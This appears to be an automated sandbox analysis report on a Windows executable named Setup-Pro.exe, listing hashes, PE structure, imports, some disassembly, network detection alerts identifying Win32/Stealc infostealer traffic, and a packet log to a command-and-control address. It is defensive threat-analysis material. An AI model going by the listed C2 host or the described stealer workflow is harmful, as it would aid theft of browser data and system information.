                                                                                                                                                              Preview:{"version":3,"file":"lib/program.js","mappings":";;;QACA,MAAMA,KAAK,oBAAQ;QACnB,MAAMC,OAAO,oBAAQ;QAGrB,MAAMC,SAASF,GAAGG,SAAS,WAAW;QAEtC,MAAMC,aAAaJ,GAAGK,aAAa,eAAe;QAGlD,MAAMC,oBAAoBN,GAAGG,WAC1BI,QAAQC,QAAQC,MAAM,kBACtBF,QAAQC,QAAQC,MAAM;QAEzB,MAAMJ,aAAa,CAACJ,MAAMS,KAAKC;YAC7B;gBACE,OAAOX,GAAGI,YAAYH,MAAMS,KAAKC;AACnC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAME,YAAY,CAACb,MAAMS,KAAKC;YAC5B;gBACE,OAAOX,GAAGc,UAAUb,MAAMS,KAAKC;AACjC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAMG,eACJT,oBAAoB,CAACL,MAAMS,KAAKC,KAAKK,OAAOJ;YAI1C,KAAKA,MAAMA,GAAGC,SAAS,UACrBG,GAAGJ,UAEHZ,GAAGiB,MAAMhB,MAAMS,KAAKC,KAAKK;AAAE,YAE7B,CAACE,GAAGC,IAAIC,KAAKJ,OAAOA;QAGxB,MAAMK,mBACJf,oBAAoB,CAACL,MAAMS,KAAKC;YAC9B;gBACE,OAAON,WAAWJ,MAAMS,KAAKC;AAC/B,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;gBACRE,UAAUb,MAAMS,KAAKC;AACvB;AAAA,YAEA,CAACV,MAAMS,KAAKC,QAAQN,WAAWJ,MAAMS,KAAKC;QAG9C,MAAMW,cAAcf,QAAQC;QAC5B,IAAIe,UAAU,CAACtB,MAAMuB,SAASR,OAAOhB,GAAGuB,QAAQtB,MAAMuB,SAASR;Q
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32768
                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32768
                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Entropy (8bit):6.516758381745191
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:Setup-Pro.exe
                                                                                                                                                              File size:24'551'424 bytes
                                                                                                                                                              MD5:172cdb7dba672c53f3fae91ad779c940
                                                                                                                                                              SHA1:8025e4ac0cb3d692c5faebec737f8551df2a2666
                                                                                                                                                              SHA256:256372f3322cb5700e6ebbebebc9cac6877d0478f57260d32f2b0488df522cf9
                                                                                                                                                              SHA512:59050c1587ee5c99b4fdcb0d7ce9afcad6ce19368a9adf66c45c28155eca6755269e4a1b7957db802887da526736f59dbafd0834c6a2444c94455557688782c1
                                                                                                                                                              SSDEEP:98304:68f0tf2zUbMIO8eJ7RLOs5w9+SyAHthfBc4WWCBWCEdDizVpv17xpQTiTj+9:OczHJdo3JcQCBWCmypv17EmTi
                                                                                                                                                              TLSH:7D371910FA8B54F1DE07487100DF623B23396D059B388ACBF68D7A6DF737A960976606
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........u..................X.......p.......Ph...@...........................y.....I.v...@................................
                                                                                                                                                              Icon Hash:0c0c2d33ceec80aa
                                                                                                                                                              Entrypoint:0x4770f0
                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:6
                                                                                                                                                              OS Version Minor:1
                                                                                                                                                              File Version Major:6
                                                                                                                                                              File Version Minor:1
                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                              Import Hash:1aae8bf580c846f39c71c05898e57e88
                                                                                                                                                              Instruction
                                                                                                                                                              jmp 00007FCBB0C320E0h
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              sub esp, 28h
                                                                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                                                                              mov dword ptr [esp+10h], ebp
                                                                                                                                                              mov dword ptr [esp+14h], esi
                                                                                                                                                              mov dword ptr [esp+18h], edi
                                                                                                                                                              mov dword ptr [esp], eax
                                                                                                                                                              mov dword ptr [esp+04h], ecx
                                                                                                                                                              call 00007FCBB0C0D416h
                                                                                                                                                              mov eax, dword ptr [esp+08h]
                                                                                                                                                              mov edi, dword ptr [esp+18h]
                                                                                                                                                              mov esi, dword ptr [esp+14h]
                                                                                                                                                              mov ebp, dword ptr [esp+10h]
                                                                                                                                                              mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                              add esp, 28h
                                                                                                                                                              retn 0004h
                                                                                                                                                              ret
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              sub esp, 08h
                                                                                                                                                              mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                              mov edx, dword ptr [ecx]
                                                                                                                                                              mov eax, esp
                                                                                                                                                              mov dword ptr [edx+04h], eax
                                                                                                                                                              sub eax, 00010000h
                                                                                                                                                              mov dword ptr [edx], eax
                                                                                                                                                              add eax, 00000BA0h
                                                                                                                                                              mov dword ptr [edx+08h], eax
                                                                                                                                                              mov dword ptr [edx+0Ch], eax
                                                                                                                                                              lea edi, dword ptr [ecx+34h]
                                                                                                                                                              mov dword ptr [edx+18h], ecx
                                                                                                                                                              mov dword ptr [edi], edx
                                                                                                                                                              mov dword ptr [esp+04h], edi
                                                                                                                                                              call 00007FCBB0C34534h
                                                                                                                                                              cld
                                                                                                                                                              call 00007FCBB0C335CEh
                                                                                                                                                              call 00007FCBB0C32209h
                                                                                                                                                              add esp, 08h
                                                                                                                                                              ret
                                                                                                                                                              jmp 00007FCBB0C343E0h
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              int3
                                                                                                                                                              mov ebx, dword ptr [esp+04h]
                                                                                                                                                              mov ebp, esp
                                                                                                                                                              mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                              mov ecx, dword ptr [ebx+04h]
                                                                                                                                                              cmp ecx, 00000000h
                                                                                                                                                              je 00007FCBB0C343E1h
                                                                                                                                                              mov eax, ecx
                                                                                                                                                              shl eax, 02h
                                                                                                                                                              sub esp, eax
                                                                                                                                                              mov edi, esp
                                                                                                                                                              mov esi, dword ptr [ebx+08h]
                                                                                                                                                              cld
                                                                                                                                                              rep movsd
                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x16fe0000x44c.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x17900000xe8f4.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x16ff0000x8fe30.reloc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1686c400xb4.data
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              .text0x10000x92cd580x92ce001ae32e3587f6f6b7c04a5be2b710b03bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .rdata0x92e0000xd56d300xd56e009288bfa8a9497fcbfbda89870ca0c54cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              .data0x16850000x7804c0x46e003dd4bc00f6f37be1887862f6fe40462bFalse0.4283578593474427data5.50127631419606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .idata0x16fe0000x44c0x600d4fc643dd55097ba2ebad39a74e8996bFalse0.357421875OpenPGP Public Key3.971205540494859IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .reloc0x16ff0000x8fe300x90000432a7b47b157a07ae027b8970caebbe7False0.4979197184244792data6.710981748779555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .symtab0x178f0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .rsrc0x17900000xe8f40xea009d62199e06a4fba95e1f54b955d67e90False0.16442975427350429data3.49913537187164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              RT_ICON0x17903840xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                                                                                                                              RT_ICON0x1790dec0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                                                                                                                              RT_ICON0x17914540x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                                                                                                                              RT_ICON0x179173c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                                                                                                                              RT_ICON0x17918640x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                                                                                                                              RT_ICON0x1792e8c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                                                                                                                              RT_ICON0x1793d340x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                                                                                                                              RT_ICON0x17945dc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                                                                                                                              RT_ICON0x1794b440x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                                                                                                                              RT_ICON0x1795e2c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                                                                                                                              RT_ICON0x179a0540x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                                                                                                                              RT_ICON0x179c5fc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                                                                                                                              RT_ICON0x179d6a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                                                                                                                              RT_GROUP_ICON0x179db0c0xbcdataEnglishUnited States0.6170212765957447
                                                                                                                                                              RT_VERSION0x179dbc80x584dataEnglishUnited States0.26203966005665724
                                                                                                                                                              RT_MANIFEST0x179e14c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                                                                                                              DLLImport
                                                                                                                                                              kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                              EnglishUnited States
                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                              2024-10-11T22:32:24.119417+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:24.589048+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:24.595348+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config145.66.249.16280192.168.2.849707TCP
                                                                                                                                                              2024-10-11T22:32:25.054244+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:25.066564+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config145.66.249.16280192.168.2.849707TCP
                                                                                                                                                              2024-10-11T22:32:26.111297+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:26.575559+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:32.372621+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:34.428036+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:36.031709+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:37.553660+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:40.731271+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:42.144224+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              2024-10-11T22:32:45.684466+02002044249ET MALWARE Win32/Stealc Submitting Screenshot to C21192.168.2.84970745.66.249.16280TCP
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Oct 11, 2024 22:32:22.431911945 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:22.574512005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:22.574606895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:22.574843884 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:22.579749107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:23.487524033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:23.487606049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:23.490567923 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:23.495526075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:24.119239092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:24.119416952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:24.121002913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:24.126465082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:24.588928938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:24.588956118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:24.589047909 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:24.590255976 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:24.595347881 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054172993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054198980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054214001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054236889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054244041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.054253101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054270029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054290056 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.054322004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.054740906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.054783106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.061533928 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.066564083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.525747061 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.525870085 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.553062916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.553064108 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:25.558211088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.558279037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.558291912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.558336020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.558347940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:25.558360100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.110932112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.111296892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.111732006 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.116532087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575445890 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575520039 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575558901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.575561047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575603962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575637102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575647116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.575647116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.575647116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.575670004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575716972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575726986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.575726986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.575762987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.575769901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.575841904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.576448917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.577213049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.577213049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.577282906 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724036932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724138975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724173069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724226952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724261999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724292994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724324942 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724349022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724349022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724349022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724349022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724349022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724364042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.724392891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724451065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.724994898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.725029945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.725063086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.725095034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.725162983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.725162983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.725162983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.725162983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.725838900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.725873947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.725907087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.725908995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.725908995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.725940943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.726155996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.726155996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.726653099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.726710081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.726742029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.726744890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.726777077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.726799965 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.727428913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.727543116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.727576017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.727612972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.727720022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.727720022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.812429905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.812582970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:26.873560905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:26.873610973 CEST804970745.66.249.162192.168.2.8
